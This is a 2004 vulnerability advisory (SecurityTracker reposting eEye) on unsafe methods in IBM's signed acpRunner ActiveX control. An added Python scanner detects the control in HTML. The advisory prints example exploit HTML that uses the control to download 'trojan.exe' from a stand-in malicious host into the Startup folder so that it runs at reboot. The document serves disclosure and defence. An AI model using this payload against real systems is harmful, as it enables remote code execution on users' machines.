Category:   Application (Generic)  >   IBM acpRunner
Vendors:   IBM
IBM acpRunner ActiveX Control Has Unsafe Methods That Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1010499
SecurityTracker URL:
CVE Reference:   CVE-2004-0586   (Links to External Site)
Updated:  Jun 24 2004
Original Entry Date:  Jun 16 2004
Impact:   Execution of arbitrary code via network, Modification of system information, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): acpRunner Activex Version
Description:   A vulnerability was reported in IBM acpRunner. A remote user can execute arbitrary code on the target system.

eEye Digital Security reported that the eGatherer ActiveX component contains several methods that allow a remote user to write a file to the target user's startup folder. The affected methods include "DownLoadURL", "SaveFilePath", and "Download".

A remote user can create HTML that, when loaded by the target user, will cause a file to be written to the startup folder and then later executed when the system restarts. Using this method, a remote user can execute arbitrary code on the target system with the privileges of the target user.

The vendor was reportedly notified on February 20, 2004.

The original advisory is available at:

A demonstration exploit is described in the advisory.

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   The vendor has issued a fixed version, available at:

Vendor URL: (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.

 Source Message Contents


IBM acpRunner Activex Dangerous Methods Vulnerability

Release Date:
June 15, 2004

Date Reported:
February 20, 2004

Patch Development Time (In Days):

High (Remote Code Execution)


Systems Affected:
acpRunner Activex Version

eEye Digital Security has discovered a security vulnerability in IBM's signed "acpRunner" 
activex. Because this application is signed, it might be presented to users on the web for 
execution in the name of IBM. If users trust IBM, they will run this, and their systems 
will be compromised. This activex was designed by IBM to be used for an automated support 
solution for their PCs. An unknown number of systems already have this activex on their 

The issue is quite simple. Activex is a very profound web technology. As a profound web 
technology it may be abused. Designers might create an activex which could perform any 
function on a user's computer. Microsoft relies on trust for the security model and warns 
against making activex with dangerous capabilities. The responsibility, however, rests 
with the creator of the activex, as in any trust model.

In this case, IBM made available methods named such as "DownLoadURL", "SaveFilePath", and 
"Download". Almost needless to say, these methods allow a remote attacker to have a victim 
system silently download the file of their choosing into the location of their choosing. 
By downloading an executable file to the Startup folder, this malicious executable would 
be automatically executed on start up.

Technical Details:
-----------EXAMPLE HTML---------

<object width="310" height="20" 
id="runner" classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3" 
<script>
runner.DownLoadURL = "http://malicioussystem/trojan.exe";
runner.SaveFilePath = "\..\\Start Menu\\Programs\\Startup";
runner.FileSize = 96,857;
runner.FileDate = "01/09/2004 3:33";


In the above example, we see the object called utilizing the "object" tag. The codebase 
tag is used by the browser to initiate the install of the activex if it is not already 
existing on the system. This would bring up the activex prompt which essentially asks the 
user if they trust IBM. Finally, the object is named "runner", so we might reference it 
later in script and use its dangerous methods.

In the script we see we access the dangerous methods of "runner" in a completely 
straightforward manner. The "SaveFilePath" method uses a local url on the user's system 
which will accurately point to the user's startup folder. Finally, the method "Download" 
is called, and a progress meter shows the trojan file being downloaded to the exploit 
folder on the user's system. At restart, the OS would automatically run the trojan.

Retina Network Security Scanner has been updated to identify this vulnerability.

Vendor Status:
IBM has released a patch for this vulnerability. The patch is available at the following 

Additional Research: Drew Copley


Copyright (c) 1998-2004 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is 
not to be edited in any way without express consent of eEye. If you wish to reprint the 
whole or any part of this alert in any other medium excluding electronic medium, please 
email for permission.

The information within this paper may change without notice. Use of this information 
constitutes acceptance for use in an AS IS condition. There are no warranties, implied or 
express, with regard to this information. In no event shall the author be liable for any 
direct or indirect damages whatsoever arising out of or in connection with the use or 
spread of this information. Any use of this information is at the user's own risk.
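
For defenders who need to find pages or archived mail that reference this control, the following added example (not part of the eEye or SecurityTracker text) scans HTML for an object tag carrying the CLSID quoted in the advisory and reports which of the named members a script touches on it. The function name scan_html, the result keys and the sample page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID and member names are the ones quoted in the advisory above.
ACPRUNNER_CLSID = "E598AC61-4C6F-4F4D-877F-FAC49CA91FA3"
RISKY_MEMBERS = ("DownLoadURL", "SaveFilePath", "Download")

# Constructed sample page (placeholder host), used only to exercise the scanner.
SAMPLE = (
    '<object id="runner" classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3"></object>'
    r'<script>runner.DownLoadURL = "http://example.invalid/f.bin";'
    r'runner.SaveFilePath = "\..\\Start Menu\\Programs\\Startup";</script>'
)

class _Collector(HTMLParser):
    """Collects ids of <object> tags with the acpRunner CLSID, plus all script text."""
    def __init__(self):
        super().__init__()
        self.ids, self.scripts, self._in_script = set(), [], False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            clsid = a.get("classid", "").upper().replace("CLSID:", "").strip("{} ")
            if clsid == ACPRUNNER_CLSID:
                self.ids.add(a.get("id") or a.get("name") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def scan_html(html):
    """Hypothetical helper: report control presence, members used, Startup path."""
    c = _Collector()
    c.feed(html)
    c.close()
    script = "\n".join(c.scripts)
    touched = set()
    for obj_id in filter(None, c.ids):          # only ids bound to the control
        for m in RISKY_MEMBERS:
            if re.search(r"\b%s\s*\.\s*%s\b" % (re.escape(obj_id), m), script, re.I):
                touched.add(m)
    startup = bool(re.search(r"SaveFilePath\s*=\s*[\"'][^\"']*Startup", script, re.I))
    return {"control": bool(c.ids), "members": sorted(touched), "startup_path": startup}
```

A page that instantiates the control without touching the listed members still returns control=True, which is worth reviewing on systems where the fixed version has not been installed.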

